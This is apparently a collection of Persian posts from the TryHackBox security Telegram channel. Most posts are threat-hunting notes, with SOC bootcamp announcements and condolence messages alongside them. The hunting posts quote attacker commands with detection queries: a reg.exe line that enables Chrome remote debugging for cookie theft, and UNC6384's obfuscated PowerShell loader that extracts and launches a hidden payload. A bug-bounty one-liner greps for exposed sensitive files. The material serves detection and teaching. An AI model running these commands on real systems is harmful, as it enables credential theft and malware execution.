مطمئنم که میدانید مهاجمان از قابلیت «remote debugging» اکسپلویت می کنند تا کوکی ها را از مرورگرهای وب استخراج کنند. امروز بررسی می کنیم که مهاجمان چگونه با تغییر رجیستری این قابلیت را فعال می کنند.
اگر به این گزارش نگاه کنید.
متوجه میشوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:
برای مثال، می توانیم سوءاستفاده از reg.exe را با نشانههای زیر جستوجو کنیم:
یا میتوان تمرکز را روی تغییر رجیستری گذاشت:
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
اگر به این گزارش نگاه کنید.
متوجه میشوید که مهاجم از ابزار reg.exe برای تغییر رجیستری و مجاز کردن remote debugging استفاده کرده است:
reg.exe add HKEY_CURRENT_USER\Software\Policies\Google\Chrome /v RemoteDebuggingAllowed /t REG_DWORD /d 1 /f
برای مثال، می توانیم سوءاستفاده از reg.exe را با نشانههای زیر جستوجو کنیم:
event_type: "processcreatewin"
AND
proc_file_path: "reg.exe"
AND
cmdline: "RemoteDebuggingAllowed"
یا میتوان تمرکز را روی تغییر رجیستری گذاشت:
event_type: "registryvaluesetwin"
AND
reg_key_path: "RemoteDebuggingAllowed"
به نظر شما بهترین روش تشخیص و مقابله با چنین سوءاستفادهای در محیطهای سازمانی چیست و چه لاگها یا کنترلهای دیگری را میتوان برای شناسایی زودهنگام آن به کار گرفت؟
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
❤1
فرآیند نصب بدافزار اغلب شامل باز کردن (استخراج) دادههای آرشیو شده است.
بیایید به UNC6384 نگاه کنیم.
مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:
این اسکریپت کارهای زیر را انجام میدهد:
بهدنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip میگردد
محتوای آن را میخواند
حالا روی tar تمرکز کنیم:
برای مثال، میتوان موارد اجرای tar از طریق PowerShell را جستوجو کرد:
همچنین میتوان بهدنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
امروز بررسی میکنیم که مهاجمان چگونه از ابزار tar اکسپلویت میکنند و چگونه میتوان از این موضوع برای شکار پیش دستانه (Proactive Hunting) استفاده کرد.
بیایید به UNC6384 نگاه کنیم.
مهاجم از یک فایل LNK مخرب استفاده کرده که شامل دستور زیر بوده است:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -c " ;; ;$uojsbmkvp = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *'Agenda_Meeting 26 Sep Brussels'.zip).fullname; ;;$ophcrygyu=[System.IO.File]::ReadAllBytes($uojsbmkvp);$xkasluyk=721; ;$lrbnaoxkomoi=[char]87+'r'+[char]105+'te'+[char]65+'l'+[char]108+'b'+[char]121+'tes'; ;echo $xkasluyk; ; ;echo $xkasluyk;;[System.IO.File]::$lrbnaoxkomoi($Env:temp+'\\rjnlzlkfe.ta', $ophcrygyu[$xkasluyk..($xkasluyk+1204224-1)]); ;;;echo $xkasluyk;;;;echo $xkasluyk;; TaR -xvf $Env:TEMP\rjnlzlkfe.ta -C $Env:Temp; Start-Process $Env:temp\cnmpaui.exe;"
این اسکریپت کارهای زیر را انجام میدهد:
بهدنبال یک فایل ZIP با نام Agenda_Meeting 26 Sep Brussels.zip میگردد
محتوای آن را میخواند
یک بخش پنهان از دادهها که داخل این ZIP جاسازی شده را استخراج میکند (از بایت 721 به بعد)
این بخش پنهان را در یک فایل موقت ذخیره میکند (rjnlzlkfe.ta)
آن را با استفاده از tar استخراج میکند
یک فایل اجرایی را اجرا میکند
cnmpaui.exe :
— یک فایل قانونی که برای side-loading استفاده میشود
حالا روی tar تمرکز کنیم:
tar.exe -xvf C:\Users\<USER>\AppData\Local\Temp\rjnlzlkfe.ta -C C:\Users\<USER>\AppData\Local\Temp
برای مثال، میتوان موارد اجرای tar از طریق PowerShell را جستوجو کرد:
event_type: "processcreatewin"
AND
proc_p_file_path: "powershell.exe"
AND
proc_file_path: "tar.exe"
همچنین میتوان بهدنبال استفاده از tar برای استخراج آرشیو در پوشه موقت (Temp) بود:
event_type: "processcreatewin"
AND
proc_file_path: "tar.exe"
AND
cmdline: ("xvf" AND "temp")
به نظر شما بهترین راه شناسایی اجرای مشکوک tar در سناریوهای واقعی چیست؟
➖➖➖➖➖➖➖➖➖➖➖➖➖
🆔 @TryHackBox
🆔 @TryHackBoxOfficial
🆔 @TryHackBoxStory
🆔 @RadioZeroPod
Arctic Wolf
UNC6384 Weaponizes ZDI-CAN-25373 Vulnerability to Deploy PlugX Against Hungarian and Belgian Diplomatic Entities - Arctic Wolf
Arctic Wolf Labs has identified an active cyber espionage campaign by Chinese-affiliated threat actor UNC6384 targeting European diplomatic entities in Hungary, Belgium, and additional European nations during September and October 2025.
❤4👍2
🟠 در این قسمت سرفصلهای کلیدی زیر رو بررسی کردیم:
- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC
این مباحث پایهای، شما را برای ورود به دنیای امنیت سایبری آماده میکند.
@TryHackBox
#SOC #امنیت_سایبری #بوتکمپ_SOC
- کلمات و اصطلاحات
- چیستی مرکز عملیات امنیت
- کار ها و وظایف در SOC
- مدل های کارکردن و جریان کاری در SOC
- نحوه بالا بردن مهارت در SOC
این مباحث پایهای، شما را برای ورود به دنیای امنیت سایبری آماده میکند.
@TryHackBox
#SOC #امنیت_سایبری #بوتکمپ_SOC
❤15👍3🤔2👎1
پس از روزهایی پر از التهاب و سکوت، دوباره به فضای مجازی برگشتیم. کاش حال همگی مان خوب باشد، اگرچه میدانیم چه بر ما گذشت. ما سطر به سطرِ کتابی را زندگی کردیم که خواندنش فقط اشک است و بغض.
تسلیت به تمام هموطنانی که در این چند روز سیاه، به سوگ عزیزانشان نشستند.
ما روزهایی رو گذروندیم که اگر کتاب بشه آدمهای زیادی رو به گریه میندازه .
تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن 🖤
از طرف مجموعه TryHackBox
تسلیت به تمام هموطنانی که در این چند روز سیاه، به سوگ عزیزانشان نشستند.
ما روزهایی رو گذروندیم که اگر کتاب بشه آدمهای زیادی رو به گریه میندازه .
تسلیت به همه کسایی که این چند روزه داغ عزیز دیدن 🖤
از طرف مجموعه TryHackBox
❤32🕊14👍3🍾1
دوستان این روزها کسی دل و دماغ کاری رو نداره حتی خود شما با شرایط پیش اومده .
دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
دوستان اگر سوالی یا حرفی سخنی دارید با ما در ارتباط باشید :
@ThbxSupport
❤18🕊5👎4🎃2❤🔥1🍾1
🖤 با عرض تسلیت مجدد به تمامی خانوادههای داغدار ایران، امیدوارم ما را در این داغ شریک بدانید. 🥀
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
⚫️ درود ! امیدوارم که حال همهمان هرچند در این لحظه دشوار، به تدریج بهتر شود.
وضعیت اینترنت همانطور که میدانید، ناپایدار است و آیندهاش نیز نامشخص به نظر میرسد. در این شرایط، ما با دلی اندوهگین تصمیم داریم بر روی محتوا تمرکز کنیم تا بتوانیم کمی از این فضای غمانگیز فاصله بگیریم و از فروپاشی روحی جلوگیری کنیم. با اینکه در این مدت تمایل چندانی به فعالیت نداشتم، اما معتقدم که انسانیت و احترام به یاد عزیزانی که دیگر در میان ما نیستند، از هر تخصصی مهمتر است.🕊
امروز که سی روز از فقدان این عزیزان است، بر خود لازم میدانیم که فعالیتهای خود را آغاز کنیم. با وجود اینکه بسیاری از افراد هنوز نتوانستهاند به اینترنت متصل شوند، ما به یاد کسانی که دیگر در کنار ما نیستند، از ایموجی های 🥀 🖤 🕊 استفاده خواهیم کرد و از شما نیز دعوت میکنیم در مطالب خود از این ایموجی ها بهره ببرید و در ریکشن ها در کانال از 🕊 استفاده کنید .
به امید روزی که دیگر شاهد چنین حوادث تلخی در کشور عزیزمان ایران نباشیم و بتوانیم با همدلی و همبستگی، آیندهای روشنتر بسازیم.🥀🖤🕊
🥀 جهان یادگار است و ما رفتنی
🥀به گیتی نماند به جز مردمی
با احترام و همدردی 🖤🥀🕊
از طرف مجموعه TryHackBox
🕊35❤15🔥4🤔4👍1🤩1
درود دوستان
برای راهاندازی وبسایت جدید خود به یک توسعهدهنده بکاند با تخصص در فریمورک جنگو و تسلط بر ORM جنگو نیاز داریم. این فعالیت به صورت داوطلبانه خواهد بود و مزایای ویژهای برای شما در نظر گرفته شده است.
شما علاقهمند به همکاری هستید و میخواهید جزئیات بیشتری را دریافت کنید، لطفاً به پشتیبانی ما پیام دهید:
@ThbxSupport
برای راهاندازی وبسایت جدید خود به یک توسعهدهنده بکاند با تخصص در فریمورک جنگو و تسلط بر ORM جنگو نیاز داریم. این فعالیت به صورت داوطلبانه خواهد بود و مزایای ویژهای برای شما در نظر گرفته شده است.
شما علاقهمند به همکاری هستید و میخواهید جزئیات بیشتری را دریافت کنید، لطفاً به پشتیبانی ما پیام دهید:
@ThbxSupport
👍4🕊3👎1
Try Hack Box
🚀 قسمت اول بوتکمپ SOC 0x4131! 🔗 Youtube: https://youtu.be/-lwI1ifaIXQ
🚀 قسمت دوم بوتکمپ SOC 0x4131!
در این قسمت، با مفاهیم شبکه سر و کله زدیم :
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست
با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم
برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131
🔗 Youtube:
https://youtu.be/mumH5WWF2jM
👉 قسمتهای بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC
@TryHackBox
در این قسمت، با مفاهیم شبکه سر و کله زدیم :
- مدل های مفهومی نتورک در عمل ما باهاشون چطور برخورد میکنیم
- پروتکل های مهم و کمک کننده چیا هستن
- مکانیزم های آدرس دهی در شبکه چیست
با بررسی این مباحث آماده میشیم که در ماژول بعد با network attack ها آشنا بشیم و تهدیدات رو شناسایی کنیم
از جلسه بعد از روند مفهوم و تئوری خارج می شویم و به سمت case study و task های SOC میریم
برای دانلود پی دی اف ارائه شده میتوانید به گیتهاب این بوتکمپ مراجعه کنید :
https://github.com/XaocZenon/SOC-0x4131
🔗 Youtube:
https://youtu.be/mumH5WWF2jM
👉 قسمتهای بعدی رو هم پیگیری کنید ! 💪 #SOC #امنیت_سایبری #بوتکمپ_SOC
@TryHackBox
🕊5❤3👍3
✍ داستان خودتونو تعریف کنید ! 🕊 چگونه بخشی از جامعه TryHackBox شدید یا در آن چه چیزی پیدا کردید؟🥀 شاید محتوای کانال توانسته براتون تغییری ایجاد کنه یا در چیزی کمکتون کرده باشه؟🖤
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
🕊 داستان جالب آشنایی، یا شاید یک واقعیت جالب درباره کانال یا انتقاد یا به طور کلی موضوع امنیت اطلاعات داری ؟
🖤 در کامنتها بنویسید! هر آنچه احساس میکنید و لازم میدانید را به اشتراک بگذارید درباره ی ما .
🖤🕊🥀🖤🕊🥀🖤🕊🥀🖤🕊🥀
#صحبت
❤6🕊5👨💻2😢1
🔥 فایل های حساس روی وب سرور را شناسایی میکند.
@TryHackBox
#باگ_بانتی
cat allurls.txt | grep -E "\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5"
تجربت کامنت کن
@TryHackBox
#باگ_بانتی
❤9🕊3🌚1
Session Fixation and Hijacking(fa).pdf
1.2 MB
آموزش
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
Session Fixation and Hijacking
به فارسی
اول میریم به سراغ تعریف خود Session و اهمیت session ها
سایت stateful و stateless چه تفاوتی دارد
و بعد از اون Session id ها چی هستن
و در اخر خود حملات رو توضیح میدیم و تفاوت بین شون رو متوجه میشیم
✍️نویسنده
🥀 @TryHackBox | The Chaos
🔥5🕊3👍2👌1